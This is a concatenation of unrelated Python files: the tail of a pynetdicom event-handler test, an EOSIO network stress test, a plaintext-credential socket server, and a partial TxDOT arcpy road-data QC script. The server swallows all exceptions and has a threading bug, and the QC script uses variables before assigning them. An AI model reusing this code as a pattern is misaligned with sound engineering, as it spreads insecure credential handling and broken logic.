time.sleep(0.05)
for event in triggered:
assert hasattr(event, 'current_state')
assert hasattr(event, 'fsm_event')
assert hasattr(event, 'action')
assert hasattr(event, 'next_state')
assert isinstance(event.assoc, Association)
assert isinstance(event.timestamp, datetime.datetime)
states = [ee.current_state for ee in triggered]
assert states[:3] == ['Sta1', 'Sta4', 'Sta5']
scp.shutdown()
def test_transition_raises(self, caplog):
"""Test the handler for EVT_FSM_TRANSITION raising exception."""
def handle(event):
raise NotImplementedError("Exception description")
self.ae = ae = AE()
ae.add_supported_context(VerificationSOPClass)
ae.add_requested_context(VerificationSOPClass)
handlers = [(evt.EVT_FSM_TRANSITION, handle)]
scp = ae.start_server(('', 11112), block=False, evt_handlers=handlers)
with caplog.at_level(logging.ERROR, logger='pynetdicom'):
assoc = ae.associate('localhost', 11112)
assert assoc.is_established
assoc.release()
while scp.active_associations:
time.sleep(0.05)
scp.shutdown()
msg = (
"Exception raised in user's 'evt.EVT_FSM_TRANSITION' event "
"handler 'handle'"
)
assert msg in caplog.text
assert "Exception description" in caplog.text
|
p2p_stress.py
|
import testUtils
import p2p_test_peers
import random
import time
import copy
import threading
from core_symbol import CORE_SYMBOL
class StressNetwork:
speeds=[1,5,10,30,60,100,500]
sec=10
maxthreads=100
trList=[]
def maxIndex(self):
return len(self.speeds)
def randAcctName(self):
s=""
for i in range(12):
s=s+random.choice("abcdefghijklmnopqrstuvwxyz12345")
return s
def _transfer(self, node, acc1, acc2, amount, threadId, round):
memo="%d %d" % (threadId, round)
tr = node.transferFunds(acc1, acc2, amount, memo)
self.trList.append(tr)
def execute(self, cmdInd, node, ta, eotio):
print("\n==== network stress test: %d transaction(s)/s for %d secs ====" % (self.speeds[cmdInd], self.sec))
total = self.speeds[cmdInd] * self.sec
ta.name = self.randAcctName()
acc1 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eotio, stakedDeposit=0, waitForTransBlock=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
ta.name = self.randAcctName()
acc2 = copy.copy(ta)
print("creating new account %s" % (ta.name))
tr = node.createAccount(ta, eotio, stakedDeposit=0, waitForTransBlock=True)
trid = node.getTransId(tr)
if trid is None:
return ([], "", 0.0, "failed to create account")
print("transaction id %s" % (trid))
print("issue currency0000 into %s" % (acc1.name))
contract="eotio"
action="issue"
data="{\"to\":\"" + acc1.name + "\",\"quantity\":\"1000000.0000 "+CORE_SYMBOL+"\"}"
opts="--permission eotio@active"
tr=node.pushMessage(contract, action, data, opts)
trid = node.getTransId(tr[1])
if trid is None:
return ([], "", 0.0, "failed to issue currency0000")
print("transaction id %s" % (trid))
node.waitForTransIdOnNode(trid)
self.trList = []
expBal = 0
nthreads=self.maxthreads
if nthreads > self.speeds[cmdInd]:
nthreads = self.speeds[cmdInd]
cycle = int(total / nthreads)
total = cycle * nthreads # rounding
delay = 1.0 / self.speeds[cmdInd] * nthreads
print("start currency0000 trasfer from %s to %s for %d times with %d threads" % (acc1.name, acc2.name, total, nthreads))
t00 = time.time()
for k in range(cycle):
t0 = time.time()
amount = 1
threadList = []
for m in range(nthreads):
th = threading.Thread(target = self._transfer,args = (node, acc1, acc2, amount, m, k))
th.start()
threadList.append(th)
for th in threadList:
th.join()
expBal = expBal + amount * nthreads
t1 = time.time()
if (t1-t0 < delay):
time.sleep(delay - (t1-t0))
t11 = time.time()
print("time used = %lf" % (t11 - t00))
actBal = node.getAccountBalance(acc2.name)
print("account %s: expect Balance:%d, actual Balance %d" % (acc2.name, expBal, actBal))
transIdlist = []
for tr in self.trList:
trid = node.getTransId(tr)
transIdlist.append(trid)
node.waitForTransIdOnNode(trid)
return (transIdlist, acc2.name, expBal, "")
def on_exit(self):
print("end of network stress tests")
|
main.py
|
import atexit
import operator
import select
import socket
import sys
import threading
import Server_Functions
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def Connection_Management():
try:
try:
connection, port = server_socket.accept()
received_data = connection.recv(1000).decode("utf-8", "strict")
option = ""
subject = ""
week = ""
id = ""
password = ""
filename = ""
if len(received_data) > 0:
for index in range(0, len(received_data)):
if index == 0:
if str(received_data[index]) != "0":
option += str(received_data[index])
elif index == 1:
option += str(received_data[index])
elif index == 2:
subject += str(received_data[index])
elif index == 3:
if str(received_data[index]) != "0":
week += str(received_data[index])
elif index == 4:
week += str(received_data[index])
elif (index > 5) and (index < operator.indexOf(str(received_data), "]")):
id += str(received_data[index])
elif (index > operator.indexOf(str(received_data), "]") + 1) and (
index < len(str(received_data)) - 1 - operator.indexOf(reversed(str(received_data)), "]")):
password += str(received_data[index])
elif index > len(str(received_data)) - 1 - operator.indexOf(reversed(str(received_data)), "]"):
filename += str(received_data[index])
match option:
case "1":
credential_function = Server_Functions.Credential_Functions(id, password)
retrieved_value = credential_function.Log_In()
connection.send(str.encode(retrieved_value))
case "2":
credential_function = Server_Functions.Credential_Functions(id, password)
retrieved_value = credential_function.Register()
connection.send(str.encode(retrieved_value))
case "3":
credential_function = Server_Functions.Credential_Functions(id, password)
retrieved_value = credential_function.Log_Out()
connection.send(str.encode(retrieved_value))
case "4":
profile_function = Server_Functions.Profile_Functions(id, password)
retrieved_value = profile_function.Download_Profile_Picture()
connection.send(retrieved_value)
case "5":
contacts_function = Server_Functions.Contact_Functions(id, password, filename)
retrieved_value = contacts_function.Load_Contacts()
connection.send(retrieved_value)
case "6":
contacts_function = Server_Functions.Contact_Functions(id, password, filename)
retrieved_value = contacts_function.Download_Contact_Picture()
connection.send(retrieved_value)
case "7":
grades_function = Server_Functions.Grades_Functions(id, password, subject)
retrieved_value = grades_function.Load_Grades()
connection.send(retrieved_value)
case "8":
materials_function = Server_Functions.Material_Functions(id, password, subject, "", "")
retrieved_value = materials_function.Load_Materials()
connection.send(retrieved_value)
case "9":
materials_function = Server_Functions.Material_Functions(id, password, subject, filename, week)
retrieved_value = materials_function.Download_Material()
connection.send(retrieved_value)
except:
pass
except KeyboardInterrupt:
threading.current_thread().join()
server_socket.close()
sys.exit(0)
def Server_Operation():
server_socket.listen(1000)
while True:
try:
try:
connection_management_thread = threading.Thread(target=Connection_Management())
connection_management_thread.start()
except:
atexit.register(sys.exit(0))
except KeyboardInterrupt:
threading.current_thread().join()
server_socket.close()
sys.exit(0)
break
if __name__ == "__main__":
try:
try:
print("##################################")
print("# #")
print("# SERVER OPENED AND LISTENING #")
print("# #")
print("##################################")
server_socket.bind(("0.0.0.0", 22))
print("ADDRESS: " + str(socket.gethostbyname(socket.gethostname())))
print("PORT: " + str(server_socket.getsockname()[1]))
thread = threading.Thread(target=Server_Operation())
thread.start()
except:
atexit.register(sys.exit(0))
except KeyboardInterrupt:
sys.exit(0)
|
OffSystem_v81.py
|
__date__ = '5/29/14'
__author__ = 'ABREZNIC'
import os, arcpy, xlwt, datetime, math, multiprocessing, shutil, smtplib, base64
# date
now = datetime.datetime.now()
curMonth = now.strftime("%m")
curDay = now.strftime("%d")
curYear = now.strftime("%Y")
today = curYear + "_" + curMonth + "_" + curDay
runday = now.strftime("%B") + " " + curDay + ", " + curYear
# variables
# check0 = arcpy.GetParameterAsText(0)
# check1 = arcpy.GetParameterAsText(1)
# check2 = arcpy.GetParameterAsText(2)
# check3 = arcpy.GetParameterAsText(3)
# check4 = arcpy.GetParameterAsText(4)
# check5 = arcpy.GetParameterAsText(5)
# check6 = arcpy.GetParameterAsText(6)
# check7 = arcpy.GetParameterAsText(7)
# check8 = arcpy.GetParameterAsText(8)
# check9 = arcpy.GetParameterAsText(9)
check0 = "C:\\TxDOT\\Scripts\\QC\\test"
allchecks = "false"
cityoverlaps = "true"
routeopens = "false"
offgeommeas = "false"
sublen = "false"
multimeasPNG = "false"
onattmeas = "false"
offatt = "false"
scnln = "false"
# if allchecks != "true":
# allchecks = "false"
# if cityoverlaps != "true":
# cityoverlaps = "false"
# if routeopens != "true":
# routeopens = "false"
# if offgeommeas != "true":
# offgeommeas = "false"
# if sublen != "true":
# sublen = "false"
# if multimeasPNG != "true":
# multimeasPNG = "false"
# if onattmeas != "true":
# onattmeas = "false"
# if offatt != "true":
# offatt = "false"
# if scnln != "true":
# scnln = "false"
qcfolder = check0
workspace = qcfolder + "\\" + today
where = """ ( RDBD_TYPE = 'CNCTR-GS' AND RTE_CLASS = '1' ) OR( (RTE_CLASS = '2' OR RTE_CLASS = '3') AND RDBD_TYPE = 'KG' AND RTE_CLASS <> '8' ) """
database = workspace + "\\Comanche_Copy.gdb"
roadways = database + "\\TXDOT_Roadways"
subfiles = database + "\\SUBFILES"
cities = database + "\\City"
districts = database + "\\District"
disterrors = []
if not os.path.exists(workspace):
os.makedirs(workspace)
txdotroads = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.Roadways\\TPP_GIS.APP_TPP_GIS_ADMIN.TXDOT_Roadways"
txdotsubs = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.SUBFILES"
txdotcity = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.City\\TPP_GIS.APP_TPP_GIS_ADMIN.City"
txdotdist = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.District\\TPP_GIS.APP_TPP_GIS_ADMIN.District"
cityexcept = "Database Connections\\Connection to Comanche.sde\\TPP_GIS.APP_TPP_GIS_ADMIN.ERRCHKS_CITY_OVERLAP"
def copylocal():
arcpy.AddMessage("Copying data local...")
arcpy.CreateFileGDB_management(workspace, "Comanche_Copy.gdb")
arcpy.TableToTable_conversion(txdotsubs, database, "SUBFILES")
arcpy.AddMessage("Subfiles copied.")
arcpy.Copy_management(txdotcity, cities)
arcpy.AddMessage("Cities copied.")
arcpy.Copy_management(txdotdist, districts)
arcpy.AddMessage("Districts copied.")
arcpy.SpatialJoin_analysis(txdotroads, districts, roadways)
arcpy.AddMessage("Roadways copied.")
return
def overlap(d):
try:
arcpy.AddMessage("Starting city overlap check...")
arcpy.CreateFileGDB_management(workspace, "Overlap_Working.gdb")
dbase = workspace + "\\Overlap_Working.gdb"
overlaproads = dbase + "\\OverlapRoads"
arcpy.SpatialJoin_analysis(roadways, cities, overlaproads)
arcpy.Select_analysis(overlaproads, dbase + "\\FC_Streets", """ RTE_CLASS = '3' """)
arcpy.Erase_analysis(dbase + "\\FC_Streets", cities, dbase + "\\FC_Streets_Errors")
arcpy.Clip_analysis(overlaproads, cities, dbase + "\\City_Roads")
arcpy.Select_analysis(dbase + "\\City_Roads", dbase + "\\County_Roads_Errors", """ RTE_CLASS = '2' """)
arcpy.Merge_management([dbase + "\\County_Roads_Errors", dbase + "\\FC_Streets_Errors"],
dbase + "\\MergedErrors")
arcpy.SpatialJoin_analysis(dbase + "\\MergedErrors", districts, dbase + "\\City_OverlapErrors")
exceptions = {}
cursor = arcpy.SearchCursor(cityexcept)
for row in cursor:
exceptions[row.RTE_ID] = [row.CITY, row.EXCEPTION]
del cursor
del row
errors = []
cursor = arcpy.UpdateCursor(dbase + "\\City_OverlapErrors")
counter = 0
for row in cursor:
geom = row.shape
len = geom.length * .000621371
if len < .003:
cursor.deleteRow(row)
else:
row.setValue("RTE_LEN", len)
cursor.updateRow(row)
if row.RTE_ID in exceptions.keys():
values = exceptions[row.RTE_ID]
cex = values[0]
eex = values[2]
thediff = abs(len - eex)
if row.CITY_NM == cex and thediff < .003:
pass
else:
rowinfo = [row.RTE_ID, row.RTE_LEN, row.DIST_NM, row.DIST_NBR, row.CITY_NM, row.TX_CITY_NBR]
errors.append(rowinfo)
counter += 1
else:
rowinfo = [row.RTE_ID, row.RTE_LEN, row.DIST_NM, row.DIST_NBR, row.CITY_NM, row.TX_CITY_NBR]
errors.append(rowinfo)
counter += 1
del row
del cursor
arcpy.FeatureClassToShapefile_conversion(dbase + "\\City_OverlapErrors", workspace)
arcpy.AddMessage(str(counter) + " overlap errors.")
goose = ["overlap", errors]
d.put(goose)
except:
print "!!!OVERLAP FAILED!!!"
def routeopen(d):
try:
arcpy.AddMessage("Starting route open check...")
errors = []
openstatus = {}
counter = 0
whereto = """ ( RDBD_TYPE = 'CNCTR-GS' AND RTE_CLASS = '1' ) OR( (RTE_CLASS = '2' OR RTE_CLASS = '3') AND RDBD_TYPE = 'KG' AND RTE_CLASS <> '8' ) OR( RTE_NM = '183A' AND RTE_ID LIKE '183A-%') """
cursor = arcpy.SearchCursor(roadways, whereto)
for row in cursor:
id = row.RTE_ID
if id is not None and id != "":
open = str(row.RTE_OPEN)
length = row.RTE_LEN
key = id + "=" + open
if key not in openstatus.keys():
openstatus[key] = length
else:
openstatus[key] = openstatus[key] + length
else:
errorinfo = []
oid = str(row.OBJECTID)
errorinfo.append("OID: " + oid)
errorinfo.append("N/A")
errorinfo.append("N/A")
errorinfo.append("BAD RTE_ID")
errorinfo.append(row.DIST_NBR)
errors.append(errorinfo)
counter += 1
arcpy.AddMessage(str(counter) + " null/bad RouteID errors. Let's check a few other things...")
del cursor
counter = 0
hwystatus = {}
cursor = arcpy.SearchCursor(subfiles, "(SUBFILE = 2 AND ADMIN_SYSTEM <> 8) OR SUBFILE = 3 OR SUBFILE = 1")
for row in cursor:
id = row.RTE_ID
length = row.LEN_OF_SECTION
status = row.HIGHWAY_STATUS
if status == 4 or status == 1:
thiskey = id + "=" + str(1)
if thiskey in openstatus.keys():
if thiskey in hwystatus:
hwystatus[thiskey] = hwystatus[thiskey] + length
else:
hwystatus[thiskey] = length
else:
errorinfo = []
errorinfo.append(id)
errorinfo.append("N/A")
errorinfo.append(status)
errorinfo.append("RTE_ID has SUBFILES with status which does not match TxDOT_Roadways' RTE_OPEN")
errorinfo.append(row.DISTRICT)
errors.append(errorinfo)
counter += 1
elif status == 0:
thiskey = id + "=" + str(0)
if thiskey in openstatus.keys():
if thiskey in hwystatus:
hwystatus[thiskey] = hwystatus[thiskey] + length
else:
hwystatus[thiskey] = length
else:
errorinfo = []
errorinfo.append(id)
errorinfo.append("N/A")
errorinfo.append(status)
errorinfo.append("RTE_ID has SUBFILES with status which does not match TxDOT_Roadways' RTE_OPEN")
errorinfo.append(row.DISTRICT)
errors.append(errorinfo)
counter += 1
else:
errorinfo = []
errorinfo.append(id)
errorinfo.append("N/A")
errorinfo.append(status)
errorinfo.append("HIGHWAY_STATUS must be 0 or 4")
errorinfo.append(row.DISTRICT)
errors.append(errorinfo)
counter += 1
del cursor
for key in openstatus.keys():
if key in hwystatus.keys():
linelen = openstatus[key]
sublen = hwystatus[key]
id = key.split("=")[0]
open = key.split("=")[1]
if abs(linelen - sublen) > .004:
cursor = arcpy.SearchCursor(subfiles, "RTE_ID = '" + id + "'")
for row in cursor:
Dist_Num = row.DISTRICT
try:
errorinfo = []
errorinfo.append(id)
errorinfo.append(open)
errorinfo.append("N/A")
errorinfo.append("Length error. SUBFILES LEN_OF_SECTIONS does not match ROADWAYS Route_Length")
errorinfo.append(Dist_Num)
errors.append(errorinfo)
except:
errorinfo = []
errorinfo.append(id)
errorinfo.append(open)
errorinfo.append("N/A")
errorinfo.append("RTE_ID does not exist in SUBFILES")
errorinfo.append("")
errors.append(errorinfo)
arcpy.AddMessage("check out: " + str(id))
counter += 1
else:
pass
else:
id = key.split("=")[0]
open = key.split("=")[1]
cursor = arcpy.SearchCursor(subfiles, "RTE_ID = '" + id + "'")
for row in cursor:
Dist_Num = row.DISTRICT
try:
errorinfo = []
errorinfo.append(id)
errorinfo.append(open)
errorinfo.append("N/A")
errorinfo.append("RTE_ID in TxDOT_Roadways with this RTE_OPEN does not match SUBFILES' HIGHWAY_STATUS")
errorinfo.append(Dist_Num)
errors.append(errorinfo)
except:
errorinfo = []
errorinfo.append(id)
errorinfo.append(open)
errorinfo.append("N/A")
errorinfo.append("RTE_ID does not exist in SUBFILES")
errorinfo.append("")
errors.append(errorinfo)
arcpy.AddMessage("check out: " + str(id))
counter += 1
arcpy.AddMessage(str(counter) + " subfile vs roadways Route Open errors.")
d[routeopen] = errors
except:
print "!!!RTE OPEN FAILED!!!"
def measurelength(d):
try:
arcpy.AddMessage("Starting off-system geometry check...")
counter = 0
cursor = arcpy.SearchCursor(roadways, where)
errors = []
for row in cursor:
errorinfo = []
id = row.RTE_ID
geom = row.shape
ext = geom.extent
Mmin = round(ext.MMin, 3)
Mmax = round(ext.MMax, 3)
Mdiff = abs(Mmax - Mmin)
wholelen = geom.length * .000621371
shp_len = float(format(float(wholelen), '.3f'))
rte_len = row.RTE_LEN
testlen = abs(shp_len - Mdiff)
if rte_len is not None and id is not None:
if testlen <= .003 and abs(rte_len - shp_len) > .003:
oid = str(row.OBJECTID)
arcpy.AddMessage(
"RTE_LEN replaced: " + str(oid) + "," + str(rte_len) + "," + str(shp_len) + "," + str(Mdiff))
# cur = arcpy.UpdateCursor(txdotroads, "OBJECTID = " + oid)
# for i in cur:
# i.setValue("RTE_LEN", wholelen)
# cur.updateRow(i)
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(shp_len - Mdiff))
errors.append(errorinfo)
counter += 1
elif abs(shp_len - Mdiff) > .003:
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(shp_len - Mdiff))
errors.append(errorinfo)
counter += 1
elif abs(rte_len - Mdiff) > .003:
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(rte_len - Mdiff))
errors.append(errorinfo)
counter += 1
elif abs(shp_len - rte_len) > .003:
errorinfo.append(id)
errorinfo.append(Mdiff)
errorinfo.append(shp_len)
errorinfo.append(rte_len)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append(abs(shp_len - rte_len))
errors.append(errorinfo)
counter += 1
else:
pass
else:
oid = str(row.OBJECTID)
errorinfo.append("OID: " + oid)
errorinfo.append(str(Mdiff))
errorinfo.append(str(shp_len))
errorinfo.append(str(rte_len))
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("")
errors.append(errorinfo)
counter += 1
arcpy.AddMessage(str(counter) + " measure length errors.")
del cursor
del row
d[measurelength] = errors
except:
print "!!!MEASURE LENGTH FAILED!!!"
def roadwaydict():
errors = []
counter = 0
arcpy.AddMessage("...creating subfile length dictionary...")
dictionary = {}
cursor = arcpy.SearchCursor(roadways, where)
for row in cursor:
id = row.RTE_ID
if row.RTE_LEN is not None:
len = row.RTE_LEN
else:
len = 0
oid = str(row.OBJECTID)
errorinfo = []
errorinfo.append("OBJECTID: " + oid)
errorinfo.append("")
errorinfo.append("")
errorinfo.append(Mmin)
errorinfo.append("")
errorinfo.append(Mmax)
errorinfo.append("")
errorinfo.append(len)
errorinfo.append("NO RTE_LEN POPULATED. OBJECTID: " + oid)
errors.append(errorinfo)
counter += 1
geom = row.shape
ext = geom.extent
Mmin = float(format(float(ext.MMin), '.3f'))
Mmax = float(format(float(ext.MMax), '.3f'))
if id not in dictionary.keys() and id is not None:
dictionary[str(id)] = [len, Mmin, Mmax]
elif id in dictionary.keys() and id is not None:
currentrecord = dictionary[id]
currentlength = currentrecord[0]
currentmin = currentrecord[1]
currentmax = currentrecord[2]
newlen = currentlength + len
if Mmin < currentmin:
currentmin = Mmin
if Mmax > currentmax:
currentmax = Mmax
dictionary[str(id)] = [newlen, currentmin, currentmax]
else:
oid = str(row.OBJECTID)
errorinfo = []
errorinfo.append("OBJECTID: " + oid)
errorinfo.append("")
errorinfo.append("")
errorinfo.append(Mmin)
errorinfo.append("")
errorinfo.append(Mmax)
errorinfo.append("")
errorinfo.append(len)
errorinfo.append("NO ROUTE ID. OBJECTID: " + oid)
errors.append(errorinfo)
counter += 1
del cursor
del row
arcpy.AddMessage("Dictionary complete")
arcpy.AddMessage(str(counter) + " null RTE_ID and RTE_LEN errors")
theball = [errors, dictionary]
return theball
def subfilelength(d):
try:
arcpy.AddMessage("Starting subfile length check...")
theball = roadwaydict()
errors = theball[0]
dictionary = theball[1]
total = 0
cursor = arcpy.SearchCursor(subfiles, "(SUBFILE = 2 AND ADMIN_SYSTEM <> 8) OR SUBFILE = 3 OR SUBFILE = 1")
for row in cursor:
total += 1
del cursor
del row
# counto = int(arcpy.GetCount_management(subfiles).getOutput(0))
# total = counto - 1
starter = 0
counter = 0
previous = ""
cursor = arcpy.SearchCursor(subfiles, "(SUBFILE = 2 AND ADMIN_SYSTEM <> 8) OR SUBFILE = 3 OR SUBFILE = 1", "", "",
"RTE_ID A; BMP A")
for row in cursor:
id = row.RTE_ID
if id in dictionary.keys():
current = id
if starter == 0:
sublength = 0
linevalues = dictionary[current]
linelen = linevalues[0]
linemin = linevalues[1]
linemax = linevalues[2]
bmp1 = row.BMP
bmp = row.BMP
emp = row.EMP
sublength += row.LEN_OF_SECTION
dist = row.DISTRICT
if abs((emp - bmp) - row.LEN_OF_SECTION) > .001:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append("")
errorinfo.append(sublength)
errorinfo.append("")
errorinfo.append(
"BMP and EMP difference does not equal the LEN_OF_SECTION. SUBFILE OID: " + str(row.OBJECTID))
errors.append(errorinfo)
counter += 1
previous = current
elif current != previous and starter != total:
if abs(linelen - sublength) > .003:
errorinfo = []
errorinfo.append(previous)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append(sublength)
errorinfo.append(linelen)
errorinfo.append("RTE_LEN does not equal SUBFILES total LEN_OF_SECTION")
errors.append(errorinfo)
counter += 1
if abs(linemin - bmp1) > .002:
errorinfo = []
errorinfo.append(previous)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line minimum measure does not equal starting BMP")
errors.append(errorinfo)
counter += 1
if abs(linemax - emp) > .003:
errorinfo = []
errorinfo.append(previous)
errorinfo.append(dist)
errorinfo.append("")
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line maximum measure does not equal ending EMP")
errors.append(errorinfo)
counter += 1
sublength = 0
linevalues = dictionary[current]
linelen = linevalues[0]
linemin = linevalues[1]
linemax = linevalues[2]
bmp1 = row.BMP
bmp = row.BMP
emp = row.EMP
sublength += row.LEN_OF_SECTION
dist = row.DISTRICT
if abs((emp - bmp) - row.LEN_OF_SECTION) > .001:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append("")
errorinfo.append(sublength)
errorinfo.append("")
errorinfo.append(
"BMP and EMP difference does not equal the LEN_OF_SECTION. SUBFILE OID: " + str(row.OBJECTID))
errors.append(errorinfo)
counter += 1
previous = current
elif current == previous and starter != total:
bmp = row.BMP
emp = row.EMP
sublength += row.LEN_OF_SECTION
dist = row.DISTRICT
if abs((emp - bmp) - row.LEN_OF_SECTION) > .001:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append("")
errorinfo.append(sublength)
errorinfo.append("")
errorinfo.append(
"BMP and EMP difference does not equal the LEN_OF_SECTION. SUBFILE OID: " + str(row.OBJECTID))
errors.append(errorinfo)
counter += 1
previous = current
elif current != previous and starter == total:
if abs(linelen - sublength) > .003:
errorinfo = []
errorinfo.append(previous)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append(sublength)
errorinfo.append(linelen)
errorinfo.append("RTE_LEN does not equal SUBFILES total LEN_OF_SECTION")
errors.append(errorinfo)
counter += 1
if abs(linemin - bmp1) > .002:
errorinfo = []
errorinfo.append(previous)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line minimum measure does not equal starting BMP")
errors.append(errorinfo)
counter += 1
if abs(linemax - emp) > .003:
errorinfo = []
errorinfo.append(previous)
errorinfo.append(dist)
errorinfo.append("")
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line maximum measure does not equal ending EMP")
errors.append(errorinfo)
counter += 1
sublength = 0
linevalues = dictionary[current]
linelen = linevalues[0]
linemin = linevalues[1]
linemax = linevalues[2]
bmp1 = row.BMP
bmp = row.BMP
emp = row.EMP
sublength += row.LEN_OF_SECTION
dist = row.DISTRICT
if abs((emp - bmp) - row.LEN_OF_SECTION) > .001:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append("")
errorinfo.append(sublength)
errorinfo.append("")
errorinfo.append(
"BMP and EMP difference does not equal the LEN_OF_SECTION. SUBFILE OID: " + str(row.OBJECTID))
errors.append(errorinfo)
counter += 1
if abs(linelen - sublength) > .003:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append(sublength)
errorinfo.append(linelen)
errorinfo.append("RTE_LEN does not equal SUBFILES total LEN_OF_SECTION")
errors.append(errorinfo)
counter += 1
if abs(linemin - bmp1) > .002:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line minimum measure does not equal starting BMP")
errors.append(errorinfo)
counter += 1
if abs(linemax - emp) > .003:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append("")
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line maximum measure does not equal ending EMP")
errors.append(errorinfo)
counter += 1
elif current == previous and starter == total:
bmp = row.BMP
emp = row.EMP
sublength += row.LEN_OF_SECTION
dist = row.DISTRICT
if abs((emp - bmp) - row.LEN_OF_SECTION) > .001:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append("")
errorinfo.append(sublength)
errorinfo.append("")
errorinfo.append(
"BMP and EMP difference does not equal the LEN_OF_SECTION. SUBFILE OID: " + str(row.OBJECTID))
errors.append(errorinfo)
counter += 1
if abs(linelen - sublength) > .003:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append(sublength)
errorinfo.append(linelen)
errorinfo.append("RTE_LEN does not equal SUBFILES total LEN_OF_SECTION")
errors.append(errorinfo)
counter += 1
if abs(linemin - bmp1) > .002:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append(bmp1)
errorinfo.append(linemin)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line minimum measure does not equal starting BMP")
errors.append(errorinfo)
counter += 1
if abs(linemax - emp) > .003:
errorinfo = []
errorinfo.append(current)
errorinfo.append(dist)
errorinfo.append("")
errorinfo.append("")
errorinfo.append(emp)
errorinfo.append(linemax)
errorinfo.append("")
errorinfo.append("")
errorinfo.append("Line maximum measure does not equal ending EMP")
errors.append(errorinfo)
counter += 1
starter += 1
arcpy.AddMessage(str(starter) + "/" + str(total))
else:
starter += 1
arcpy.AddMessage(str(starter) + "/" + str(total))
pass
arcpy.AddMessage(str(counter) + " subfile length errors.")
d[subfilelength] = errors
except:
print "!!!SUBFILE LENGTH FAILED!!!"
def removevertices(d):
try:
arcpy.AddMessage("Starting multipart and vertex measure check...")
counter = 0
errors = []
query = """ RDBD_TYPE <> 'CNCTR-GS' AND RDBD_TYPE <> 'CONNECTOR' AND RDBD_TYPE <> 'OTHER' AND RDBD_TYPE <> 'RAMP' AND RDBD_TYPE <> 'TURNAROUND' """
cursor = arcpy.SearchCursor(roadways, query)
for row in cursor:
geom = row.shape
allparts = geom.getPart()
if allparts.count > 1:
errorinfo = []
errorinfo.append(row.OBJECTID)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("Multipart feature.")
errors.append(errorinfo)
counter += 1
try:
lastX = 0
lastY = 0
lastM = 0
for part in allparts:
srtpnt = 0
for pnt in part:
if srtpnt == 0:
x = pnt.X
y = pnt.Y
m = pnt.M
if row.RDBD_TYPE == "LG" or row.RDBD_TYPE == "XG":
if math.isnan(m):
errorinfo = []
errorinfo.append(row.OBJECTID)
errorinfo.append(row.RTE_ID)
errorinfo.append(row.DIST_NM)
errorinfo.append(row.DIST_NBR)
errorinfo.append("Has vertex with zero measure, apply measures.")
if errorinfo not in errors:
errors.append(errorinfo)
counter += 1
lastX = x
lastY = y
lastM = m
srtpnt += 1
else:
x = pnt.X
y = pnt.Y
m = pnt.M
if row.RDBD_TYPE == "LG" or row.RDBD_TYPE == "XG":
if math.isnan(m):
errorinfo = []
errorinfo.append(row.OBJECTID)
